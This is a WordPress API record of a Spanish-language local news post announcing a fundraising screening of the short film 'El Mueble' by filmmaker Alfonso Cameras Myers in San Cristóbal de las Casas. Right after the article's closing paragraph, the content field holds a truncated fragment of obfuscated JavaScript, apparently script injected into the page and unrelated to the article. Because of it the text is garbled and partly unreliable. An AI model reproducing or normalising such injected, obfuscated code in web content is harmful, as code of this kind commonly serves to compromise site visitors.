{"id":17384,"date":"2024-08-21T05:00:30","date_gmt":"2024-08-21T05:00:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17384"},"modified":"2024-08-21T05:00:31","modified_gmt":"2024-08-21T05:00:31","slug":"presentaran-cortometraje-el-mueble-en-la-ensenanza","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17384","title":{"rendered":"Presentar\u00e1n cortometraje &#8220;El Mueble&#8221; en La Ense\u00f1anza"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"696\" height=\"617\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240820-WA0012.jpg\" alt=\"\" class=\"wp-image-17385\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240820-WA0012.jpg 696w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240820-WA0012-300x266.jpg 300w\" sizes=\"auto, (max-width: 696px) 100vw, 696px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>20 de agosto del 2024. San Crist\u00f3bal de las Casas.- El pr\u00f3ximo jueves 29, el cineasta coleto Alfonso Cameras Myers presentar\u00e1 su cortometraje titulado &#8220;El Mueble&#8221;, actualmente en proceso de postproducci\u00f3n, en un evento especial que se llevar\u00e1 a cabo en la Casa de La Ense\u00f1anza.<br>La proyecci\u00f3n tiene como objetivo recaudar fondos, mediante una cooperaci\u00f3n voluntaria, para completar la producci\u00f3n del cortometraje, que narra una historia llena de matices y profundidad, caracter\u00edstica del trabajo de Cameras Myers.<br>El cineasta invita a la comunidad a apoyar este proyecto cultural y disfrutar de un adelanto de lo que promete ser una obra cinematogr\u00e1fica de gran calidad.<br>\u201cLa cita es una oportunidad \u00fanica para conocer de cerca el proceso creativo de un realizador local y contribuir al desarrollo del cine independiente en la regi\u00f3n\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 20 de agosto del 2024. San Crist\u00f3bal de las Casas.- El pr\u00f3ximo jueves 29, el cineasta coleto Alfonso Cameras Myers presentar\u00e1 su cortometraje titulado &#8220;El Mueble&#8221;, actualmente en proceso de postproducci\u00f3n, en un evento especial que se llevar\u00e1 a cabo en la Casa de La Ense\u00f1anza.La proyecci\u00f3n tiene como objetivo recaudar fondos, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17385,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17384","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17384","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17384"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17384\/revisions"}],"predecessor-version":[{"id":17386,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17384\/revisions\/17386"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17385"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17384"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17384"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17384"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}